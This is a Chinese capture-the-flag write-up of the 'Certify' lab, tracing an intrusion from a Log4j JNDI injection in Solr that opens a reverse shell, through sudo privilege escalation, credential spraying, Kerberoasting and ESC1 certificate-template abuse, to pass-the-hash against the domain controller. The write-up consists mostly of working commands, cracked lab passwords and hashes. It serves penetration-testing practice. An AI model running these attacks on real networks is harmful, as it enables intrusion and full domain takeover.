春秋云境 Certify
flag01
fscan扫描
1 2 3 4 5 6 7 8 9 10 11 12 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan (icmp) Target 39.98.115.180 is alive [*] Icmp alive hosts len is: 1 39.98.115.180:22 open 39.98.115.180:80 open 39.98.115.180:8983 open
访问39.98.115.180:8983发现是solr界面
1 ${jndi:rmi://ip:1099/7dbozo}
https://github.com/welk1n/JNDI-Injection-Exploit
搜索发现solr的Nday存在log4j漏洞,启动恶意服务器反弹shell,在core admin界面填写恶意payload后add core即可
拿到shell之后上线做下持久化处理,发现并非root权限估计需要提权,查看suid权限命令发现并没有可利用命令,sudo -l执行后发现可以无密码执行grc命令
尝试使用grc进行提权
flag02
内网扫描结果如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 172.22.9.19:80 open 172.22.9.47:445 open 172.22.9.26:445 open 172.22.9.7:445 open 172.22.9.26:139 open 172.22.9.47:139 open 172.22.9.26:135 open 172.22.9.7:135 open 172.22.9.7:80 open 172.22.9.47:22 open 172.22.9.19:22 open 172.22.9.47:21 open 172.22.9.47:80 open 172.22.9.7:139 open 172.22.9.7:88 open 172.22.9.19:8983 open [*] NetBios: 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC [*] NetInfo: [*]172.22.9.26 [->]DESKTOP-CBKTVMO [->]172.22.9.26 [*] NetInfo: [*]172.22.9.7 [->]XIAORANG-DC [->]172.22.9.7 [*] WebTitle: http://172.22.9.19 code:200 len:612 title:Welcome to nginx! [*] WebTitle: http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works [*] NetBios: 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] NetBios: 172.22.9.47 fileserver Windows 6.1 [*] 172.22.9.47 (Windows 6.1) [*] WebTitle: http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/ [*] WebTitle: http://172.22.9.7 code:200 len:703 title:IIS Windows Server [*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin [+] http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
存在一个泄露漏洞,看了下poc感觉像是误报,把开放的站大致看了看没什么能打的,发现存在文件服务器,使用nmap进一步扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Host script results: | smb2-time: | date : 2024-08-03T17:59:02 |_ start_date: N/A | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: fileserver | NetBIOS computer name: FILESERVER\x00 | Domain name: \x00 | FQDN: fileserver |_ System time: 2024-08-04T01:59:06+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required
这里显示使用了guest账户进行扫描,可能存在未授权访问漏洞,使用脚本尝试连接
发现确实存在未授权,在secret下找到了flag02,并且获取了personnel.db文件
flag03
连接db文件,发现了一堆用户名和密码,先尝试进行一波crackmapexec爆破
1 proxychains4 crackmapexec smb 172.22.9.1/24 -u user.txt -p pass.txt --continue-on-success 2>/dev/null
这里建议一个一个爆,因为爆到文件服务器的时候会全爆成功,迷惑的很
1 2 xiaorang.lab\zhangjian:i9XDE02pLVf xiaorang.lab\liupeng:fiAzGwEMgTY
尝试rdp登录,结果如下
两个都是这样的返回结果,根据flag02的提示,这里应该要查询SPN,这里需要先简单提及几个概念
Kerberos
域环境中非常常见的身份认证协议,认证过程主要有以下三个方面
身份验证服务 (AS) 交换 (KRB_AS_*)
票证授予服务 (TGS) 交换 (KRB_TGS_*)
客户端/服务器 (AP) 交换 (KRB_AP_*)
在这里我们主要关注的是TGS交换过程,这里的AS和TGS是KDC的两个组成部分
SPN
服务主体名称(SPN:ServicePrincipal Names)是服务实例的唯一标识符。可以理解为域内服务的身份证,每个服务都有一个唯一的SPN,而服务在注册SPN的时候会和账号进行绑定,因此SPN起到了将服务实例与服务登录帐户相关联的作用。一个SPN对应一个账户和一个服务,但一个账户可以对应多个SPN和服务
这里比较重要的是,任何一个域内账户都可以向DC查询所有域内用户对应的SPN 并进行TGS交换 过程,在KRB_TGS_REP 过程将会返回查询到的用户的TGS tickets ,然后我们即可使用爆破工具对于返回的票据进行爆破,获取对应明文。
查询结果如下
1 2 proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY 2>/dev/null proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf 2>/dev/null
1 2 $krb5tgs$23$*zhangxia$XIAORANG .LAB$xiaorang .lab/zhangxia*$13288c81c67ba7897cac2231d7ac9cb5$da825bd13667cca66080fbd097e26db11c13f5c3c654b6eb768d77dc174761bf91230aecd34133bc583ac5fa9e6d9011d576dc49296c9948408d5a30231af8bb47efea9b129bdee900c9dffb768eecb5c26b63d0f0dbf09360f0d7981856301beb0e41093dca962dd21813d4b9ae051579df75ebbb1e6a4ea3de0278ba25744d43db7399da8d273c7344626555598814513093fe8d8306ceaac6ff4989ac683b84ab54bc74d06b35efeb79ded926f409bd2be84b135f053242a568babf7903a55343a3ab42e453e3cecb431cc93390f9c143ea4830275c9b0e74e77ffbcf9dc44793f139cb501ed0f744c057d7fe5bde2c276350b1b1337cde3263b0307226cd3bcc3d0eebcc1928aaae1b7444ccc5324808d3e83bc227f9b09ce55c84247fa5227d6db3e32c3fccd362ca501c6b7d04835188c5db5c6df48b10206309ab8725c84ff23a1c61aa135b360db7b24db17ed5bfcd9f225283c317cee73bb954815f4f3c2fcbbb4a17c865b86535c34f8db9853937fb41508a633ba4af90aad065ab4455d27101b304d5cf672a00e12a44a13146ea9a9196c6833fda9a2cbe78ead58672c4680d7f720d3cdef8738f6c007d6f47a59d7f77acd70acb1492e0ef09faab42c54b3af487c31add18343e3ee7d2bd4c3f6d88cc271b397c195e07a4668723854190e7706e18875886be8d5af29a26ae010f2bcff9d3db3b53563f4f8c2efe7adc0a5a6a59017ece07f47a656e5de3fcb01eece1aa2c721e1d284615233056d56ea32c6dbd923b3ae6b6a609a2e0d1992d408c4703562e47af94be585ecb61140202c8cc42f6e14117026cdee449b0ac996f704b5dcdad4c20d1c346a600cced7422e499d8eabfca9c86903ee2d24f7f1392279dd90c6d5c22b8e53c90e367379cccc7f62c2107c8c5e56bb7148fd4d41bf7e63e2373f5ddc631ce73364404bee3324d4c3556951ca9e36fd15d7ff65b9352ae20a73a27a8c419ccc1281b884242ea6ecceea809d0502c9b598aefc0c3d5c798305b395ac23e9b0da9b9c74910c307428127fe9eeaeb8227e3a8f168000f33f9d5040e256b5b0374e3343aa8ef1e5d62e0433190723bc4c39ffce427194b0ef4380d11013a8d0ad5f196097f5200c0d7beb1ea98d8a13a36cfb2e89d63356860f6be81a7d05dc131d48149e54b07db82d1431d32a866e29a9463d90b170b8bee496767c892bbd81906d91dcd8534d99a8e4320cdbdc62a8673c158c452c178e55bb680fdb37b721da5d65d78e4705280a167f39b1c81fc6d9660244fa96293cc4285189333fb82fa5d3b3dfa7ebc57a50a99507a526cf678fb7205e930d547d780ebf63b6d7ac0c5e553f8bdf1d7efb497d3779060c865c4bc955131eb242e0efb2e804a215305041bb07fd832109d9e55f1b6043730412fc1e68c929afb58d7a6ff0df472f669659d9193d31ceac7ed3dd3341a7ab816d088dc84001a3f7c660bfa10f8d9fbefee03dc9a07f0e7d64bf88e1f7e0a51c82b6c $krb5tgs$23$*chenchen$XIAORANG .LAB$xiaorang .lab/chenchen*$5199d92f23d1475890b372e8a7b0540d$c4a300433edcea30edef3ef53e42e32effa1de63b3edc3555f35b0f6d46c039758ab09c2c51ebeacfa7cb83c744e46b6eeaf45a7b7937aedaa8ed46c5e224235c953fd152f33d9def1a566cc00beee0dd5a83bf937a28aca2a025e56d7243b83cb51c73c526ba69917764d1c4a775c86e27ce16bf733a8a0ae31d7c32fdf33c99d89dc34ebcc20498ef6d59472a34fd76e5fed48b188a3968a6d8a3ec4fa7ba0e3ca773082df24ca022dc4d2c1c055d05dc429c8448dc5a55a466f739ab394596527b336eff8fe8dd5a6712b09e116a0718ca6392e3ccdb2eef1732f4f27f6da4b90c9030418e2249b2c5f8dfd08335a94c552927a77d85d2c8e6c67550900ba7dcf40a8dc03f3e28389d0b399133816e66774a6ac6ce6f09fec09d117528188e96e4ff589cf183416aa3aa8c16f0211459946e9ed2d29ea39f68fbd6dc7989263f382561399417fcfa5ea254b8a973538399a11cef5fada4455ac0557c97033cf9a68776f08db2ebbbf7e7f1c32aebc9ac1c5489db62b80a3f2b10b214bae79ff9e489df1726812f46e5e8a0234d1a58fb17a032c94b3911e161cb83b53bbd9d7262604a7fd0c48d0123239f53a35c87c40b8660d017fbaccc4e8745653d3e113d04441997fc46646382074ecb3a02cc6d89b9a7da3fe2691433fba2a99b59b10d4479f4f038b1bec110595327a50470b0eb86d50dc84b8a61748e6532a55a39f0ee71f654e2ec441588b7bcde70c6b2618bc52ff480e57e55dca6afe9abfe244808fe261ee4b43fc8a43e23f140b8ac63000a7b576eabea681cc67b3771e60b08bda02ba737e9fa7e661ef46df685030e6b8ad5a4597d5e6a17fbf8fcdbbcf3df461cdb654a98bb2d0775036e99bd051550704c9463bed660025a59fc53341c466349f113e159237d4952c7b84025321e7217f9d6c761eed3fa4937f17492d3d6c4fb45b4924ebb900ff00f32f76e22839441020aa65f405638b82edd7f8ca65b92548c79a742fcb2facd86b96a6d8019cbbc138fa0a7ff9196c228354aefcf6dce54ad453f346e93329544f2bb62a0cc29dbb7bfc447426127f14fa54fab85134ef4d47802b1be6ee26a7df056e6521f0c067ec759022ee5fc37e7ed430ee12535697980a2b5963f016c68bbaa58fddfd3c9eef8f4349c33561da679cb9b704b3d5a865d9190b152c0861635203f6565a655c1ae6de9eb69b89ce9742c04f318dacb888da6c31a1febc151bba96c4dc93212338ca3b02a1afdeb696725bce59ac7419074d8ae069a1beb48ff1c1851770d461b2277e322456865c7baedf7e723c3815a30230f6886b454cda13f3bfb2e2e52d856a670124f65f379146afe69ce88f02a1ac8c1e24c826971621fe0a5cb8e38574229a8b4603cf7ff1cf95f06cf6f91821528ac0a7881a47e5288b1c108bf0df297d5757de745abdc6c4de655fb4abbf3c59747077d5d862152faf7dd0001695196c0d03d168cf0deda63b43eb64099d454519ef62954a1aa22b
1 hashcat -a 0 -m 13100 hash.txt ./rockyou.txt
爆破出来两个密码
1 2 xiaorang.lab\zhangxia MyPass2@@6 xiaorang.lab\chenchen @Passw0rd@
rdp登录成功,但是没有权限读flag,由于存在CA认证服务器结合题目名,尝试查看是否存在错误配置的证书
1 Certify.exe find /vulnerable
重点查看这三个属性是否符合漏洞(ESC1)条件
1 2 3 4 5 msPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECT mspki-certificate-application-policy:客户端身份验证 Enrollment Rights:XIAORANG\Domain Users
完全吻合,good,打
1 Certify.exe request /ca:XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA /template:"XR Manager" /altname:administrator
结果如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 C:\Users\Public>Certify.exe request /ca:XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA /template:"XR Manager" /altname:administrator _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.1.0 [*] Action: Request a Certificates [*] Current user context : XIAORANG\zhangxia [*] No subject name specified, using current context as subject. [*] Template : XR Manager [*] Subject : CN=zhangxia, CN=Users, DC=xiaorang, DC=lab [*] AltName : administrator [*] Certificate Authority : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 5 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAuFeHUOimAXdXIeX0QYZjFv3MRkvPLODA4QKxZ3fKWiJXfnWR w6hTC+/RMWTdGWR7R97ybagQjKCxOO5IPuqxh+XX2s/aUfAZVd0+/HXD586+uK0U +W2w7mwrfVYw2dja2+i8bpR6A/QROD3B6S9Ra0uuP04IpifmDIu2Mow6Yo9lwT7D oIMqiKOPoSZQ2Tm5P/OtrfWDyU+qe8x6Ht4ovV2b9S+nnrUm6kPkotvHL465R46t uxpLtZxV+E/zC/8p3vU3qsnaIBRc/h10LOUFCPiiNNvSd0tJWlk7f6KWt2lXmJSl XWj/8C5n1r+R8KrgN0ccYn8mVLG5hljZ1fgF3wIDAQABAoIBAAP6L3s5acuCTaj3 kyuOwLiQRUYHALNRLhgsvLMkzILhVs3tr3VvPkt1oyfTq0mO93H3h3eCNskx9mDq Ezj4S1hJRzz7WxSFf6ZwnZlI2S85MLg/U8KF8VlTkCSmJWut2BsCjH4+Sdun+m8i NfrYAIO2IE5RWrJrDfWbVhUFHYVe1UanlurJDpOzBVFTiqJrYBkOPvpjHJwFS9Wk cPvS1NQ0+gvK0Ud3swtMDhXvCmhVx9jWDPwYQFHBEi+g3ynnu6dZ7gi8mAVw/pC7 NOGBeCpfEqDmsay5QQVnBOVD3U0vgw78rK5hXIr29teInl0iw89aRAdirlgQQ6ll GzmitaECgYEAyYV2Ix5CiKx+3vCG7ljQ50Bbu9JALfwffCbh1gA5IyVzLajCwu4K 7HG4wVrArH42R/Iq4KRxWosWWzTQ9PQNKvUp26/1+OjYf03PdceXiqC2VehewW+9 s62WyM9yYPApqEu9ZFjrWhvhcREiufWQLVflJkZEerruLAjhckVqD8cCgYEA6i0k rR07rawOx80SiZ1gCVIWq9wN3hsOK6CLTBVDgCeztX3gNQXxGyaC6+InWojBx2Zt P3vSggChgmwKQU1fbYR7z13tc36+lJhyoqg5/BDFMd7lm3RgAdJo9P2J6Bmopcuf MIhI+iNThEKh7nmh803Os4xZf0pa9RxJTnImiSkCgYEAvpSsK/wjGhRgC8DXKrPu JLUVzCPDtHl64TP4YiVl49o3+hde0XDD/eZyvtFv4/Gcrh/U8wwxc1qUcv8ZGn9v sI+Y3X2klpjGnmZc69stctoYdlhCvJdLhZCGSDT/y7N1AgdW/n6lXVt+sipteAZH Ksq0GKVdf+Am/JgNdb811eMCgYEAx0t6HjZ11r1KqvI1Z5be56/MCaEy0CaYbbqp MiwakVO4lqo1CQswgdnJrDSBJ4Sh3jCmo1Oe+PLOgW+vXpoZr9wDfpzCe/uO+Gmx jgq7pnEjUekP4bguCP7oQjAQkM5dgBSGO0iRSwiLiFEo/QrZMHa0hovYkwNV26qi HLf7YdkCgYBRXkHSgvlvl72uSSIMMXD8lx4XGdo4sKlH44WioeL0M5t5aJiYVQvE DfPePBRKim+PJiloeX0qIxSsEp89qRoN2cXdWpGqX916rz3nZKdQ9UG9g1LsGoyZ BilSirIsDpFtR0oKCp8XyMzIuZ6mRUJNFWDWyfdN0Otj9JyPSyIelg== -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGQTCCBSmgAwIBAgITfgAAAAWHAI3RYCNargAAAAAABTANBgkqhkiG9w0BAQsF ADBRMRMwEQYKCZImiZPyLGQBGRYDbGFiMRgwFgYKCZImiZPyLGQBGRYIeGlhb3Jh bmcxIDAeBgNVBAMTF3hpYW9yYW5nLVhJQU9SQU5HLURDLUNBMB4XDTI0MDgwMzE4 NTgwNloXDTI1MDgwMzE4NTgwNlowUjETMBEGCgmSJomT8ixkARkWA2xhYjEYMBYG CgmSJomT8ixkARkWCHhpYW9yYW5nMQ4wDAYDVQQDEwVVc2VyczERMA8GA1UEAxMI emhhbmd4aWEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC4V4dQ6KYB d1ch5fRBhmMW/cxGS88s4MDhArFnd8paIld+dZHDqFML79ExZN0ZZHtH3vJtqBCM oLE47kg+6rGH5dfaz9pR8BlV3T78dcPnzr64rRT5bbDubCt9VjDZ2Nrb6LxulHoD 9BE4PcHpL1FrS64/TgimJ+YMi7YyjDpij2XBPsOggyqIo4+hJlDZObk/862t9YPJ T6p7zHoe3ii9XZv1L6eetSbqQ+Si28cvjrlHjq27Gku1nFX4T/ML/yne9Teqydog FFz+HXQs5QUI+KI029J3S0laWTt/opa3aVeYlKVdaP/wLmfWv5HwquA3RxxifyZU sbmGWNnV+AXfAgMBAAGjggMPMIIDCzA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3 FQiB3dAhhYHGIoPFkTqEjedRg9jIBiuBkpQlhInfBwIBZAIBBTApBgNVHSUEIjAg BgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQH/BAQDAgWg MDUGCSsGAQQBgjcVCgQoMCYwDAYKKwYBBAGCNwoDBDAKBggrBgEFBQcDBDAKBggr BgEFBQcDAjBEBgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG 9w0DBAICAIAwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFM1ln9QLzaKk KLs2gDx/+Tw9tmqFMCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlz dHJhdG9yMB8GA1UdIwQYMBaAFFe6Z2kqz4ktl3hku7D+cH+iSYCiMIHaBgNVHR8E gdIwgc8wgcyggcmggcaGgcNsZGFwOi8vL0NOPXhpYW9yYW5nLVhJQU9SQU5HLURD LUNBLENOPVhJQU9SQU5HLURDLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2 aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXhpYW9yYW5nLERD PWxhYj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9 Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcoGCCsGAQUFBwEBBIG9MIG6MIG3BggrBgEF BQcwAoaBqmxkYXA6Ly8vQ049eGlhb3JhbmctWElBT1JBTkctREMtQ0EsQ049QUlB LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp Z3VyYXRpb24sREM9eGlhb3JhbmcsREM9bGFiP2NBQ2VydGlmaWNhdGU/YmFzZT9v YmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MA0GCSqGSIb3DQEBCwUA A4IBAQADETRmjot+K43S5/SfkTCozzcSqu/RqT8Z/UBP1OTz9GPVLXp+bE665ZEf 8FRLoOOiQmCFuldH3eL379LpogpT71Ebo6hwjrlnP/LpL5b3m/spqxSW2CgE+BMe ddL3DJAC2P5P18bGkDVrUp0yYYmsPc+2eeuVGcROcaSBe/WCopddYP8iQkVlR53Q IyAatff+yMd7P6TjYLH2yXylLGZ3Z66Dy53c0wEZLC5IXOiY5MfhgJCHgEd4xQgQ DhE8XcCRFldRWeUaUTe3VHaC5HnhJA+/3ZmruLdEPjxHZCFAombzoCuxLqsvEvwc 2liMB3A/cbWoZItBw59Sbfll6MY+ -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
将-----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE-----复制保存为cert.pem
1 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
将cert.pem转换为cert.pfx,不需要输入密码
1 Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /dc:172.22.9.7 /ptt
寄,失败了,换一种方式继续申请
查询存在哪些证书
1 proxychains4 certipy find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout 2>/dev/null
继续申请证书
1 proxychains4 certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
得到administrator.pfx,使用获得的证书获取域管哈希
1 proxychains4 certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7 2>/dev/null
运行结果如下
1 2 3 4 5 6 [*] Using principal: administrator@xiaorang.lab [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@xiaorang.lab' : aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80
PTH获取域控权限
1 proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
1 atype c:\users\administrator\flag\flag04.txt
flag04
1 proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.26
1 type c:\users \administrator\flag\flag03.txt
